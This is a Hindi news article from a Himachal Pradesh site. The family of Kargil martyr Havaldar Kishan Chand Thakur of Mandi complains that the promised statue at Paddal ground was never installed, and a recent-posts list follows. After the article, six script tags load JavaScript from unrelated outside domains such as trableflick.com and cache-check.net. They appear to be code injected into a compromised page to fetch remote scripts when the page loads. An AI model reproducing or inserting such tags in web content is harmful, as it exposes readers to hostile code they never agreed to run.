Categories: हिमाचल

शहीद किश्न चंद के परिजनों को सरकार और प्रशासन से गिला, बार-बार घोषणाओं के बावजूद नहीं लगी प्रतिमा

<p>कारगिल विजय दिवस के मौके पर शहीदों के परिजनों ने सरकार और प्रशासन को उनके वायदे भी याद दिलाए हैं और कहा है कि शहीदों को सही श्रद्धांजलि वायदों को पूरा करके ही दी जा सकती है। मंडी शहर के सियालगा रामनगर के शहीद हवलदार किश्न चंद ठाकुर के बड़े भाई भवानी सिंह ठाकुर ने कारगिल विजय दिवस पर बधाई देते हुए कहा कि यह मौका शहीद परिवारों के साथ किए गए वायदों को याद करने का भी है। उन्होंने बताया कि उनके भाई ने भी कारगिल युद्ध में अपना सर्वोच्च बलिदान दिया है। तत्कालीन प्रदेश के मुख्यमंत्री प्रेम कुमार धूमल ने उसी समय एलान किया था कि मंडी के पड्डल मैदान का नाम शहीद किश्न चंद मैमोरियल स्टेडियम होगा और यहां पर उनकी प्रतिमा स्थापित की जाएगी। इसकी विधिवत अधिसूचना भी जारी हो चुकी हैं मगर शहीद की प्रतिमा आज दिन तक पड्डल मैदान में नहीं लगी।</p>

<p>भवानी सिंह ने बताया कि उनके परिवार के पास कभी इस बारे में सरकार या प्रषासन ने कोई सूचना नहीं दी या जानकारी ही दी कि इस बारे में क्या योजना है। उन्होंने बताया कि महज एक पेंटिंग मैदान के एक छोर पर बने भवन पर उस समय की गई थी मगर अब उसका भी कोई पता नहीं चलता। इस बारे में बीते साल स्वतंत्रता दिवस के मौके पर उनका परिवार परिवहन, खेल व वन मंत्री ठाकुर गोबिंद सिंह से मंडी में मिला था और उन्होंने उसी समय प्रतिमा लगाने को लेकर आदेश जारी करने की बात कही थी। उन्होंने इस बारे में जिला खेल एवं युवा सेवाएं अधिकारी को जरूरी निर्देश देने को भी कहा था मगर एक साल बीत जाने पर भी कोई पत्र उनके परिवार को नहीं मिला। उन्होंने यहां तक कहा है कि यदि सरकार के पास संसाधनों की कमी है और इस कारण से षहीद की प्रतिमा लगाई नहीं जा रही है तो परिवार भी इसमें आर्थिक मदद कर सकता है मगर कम से कम वायदा तो पूरा हो।</p>

<p>परिवार को इस बात का भी रंज है कि पड्डल स्टेडियम का नाम तो किश्न चंद ठाकुर मैमोरियल स्टेडियम रखा है मगर कभी इसका जिक्र नहीं होता। ऐसे में शहीदों की चिताओं पर लगेंगे हर साल मेले जैसी श्रंगारित रचनाएं कैसे मूर्त रूप में जिंदा रह सकेंगी। भवानी सिंह ने अपने पूरे परिवार की ओर से प्रदेष के मुख्यमंत्री जय राम ठाकुर, केबिनेट मंत्री गोबिंद सिंह ठाकुर और जिला प्रशासन मंडी से आग्रह किया है कि वह शहीद किश्न चंद ठाकुर की प्रतिमा को पड्डल मैदान में स्थापित करे और इस बारे में उनके परिवार को भी जानकारी दे। उनके नाम का उल्लेख भी स्टेडियम के नाम के साथ लगातार होना चाहिए ताकि नई पीढ़ी को भी शहीदों की शहादत के बारे में जानकारी हो सके।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_239782549&amp;key=21aca573d498d25317&amp;cv=1595758785&amp;t=1595758785403″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_78026558&amp;key=21aca573d498d25317&amp;cv=649081&amp;t=1595758785405″ type=”text/javascript”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1595758785412″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

खाटू श्याम धाम के लिए एचआरटीसी बस सेवा नवंबर से फिर शुरू

HRTC bus to Khatu Shyam: प्रसिद्ध खाटू श्याम धाम को जाने वाली प्रदेश की एकमात्र…

28 mins ago

52 साल बाद चूड़धार में शांत महायज्ञ, 28,000 भक्त बने साक्षी

  Shrigul Maharaj temple ceremony: चूड़धार स्थित शिरगुल महाराज के पवित्र मंदिर में शुक्रवार को…

43 mins ago

HRTC की स्वर्ण जयंती पर कर्मचारियों के लिए बड़ा तोहफा, 4% DA के साथ 50 करोड़ ओवरटाइम भुगतान

HRTC golden jubilee announcements: हिमाचल पथ परिवहन निगम (HRTC) ने अपने 50 वर्षों के सफर…

55 mins ago

Shimla: विजयादशमी पर सिंदूर की होली, महिलाओं ने दी मां दुर्गा को विदाई

Kalibari Temple Durga prayers: देशभर में विजयादशमी का पर्व धूमधाम से मनाया जा रहा है,…

1 hour ago

हिमाचल में भूकंप: शिमला में 3.0 तीव्रता के झटके

EarthquakeTremors:  हिमाचल प्रदेश के शिमला और आसपास के क्षेत्रों में आज दोपहर 3:32 बजे भूकंप…

1 hour ago

अंतरराष्ट्रीय कुल्लू दशहरा: 13 से 19 अक्तूबर तक भव्य आयोजन, 332 देवता होंगे शामिल

  Kullu Dussehra 2024: अंतरराष्ट्रीय कुल्लू दशहरा उत्सव का शुभारंभ  13 अक्तूबर को राज्यपाल शिव…

22 hours ago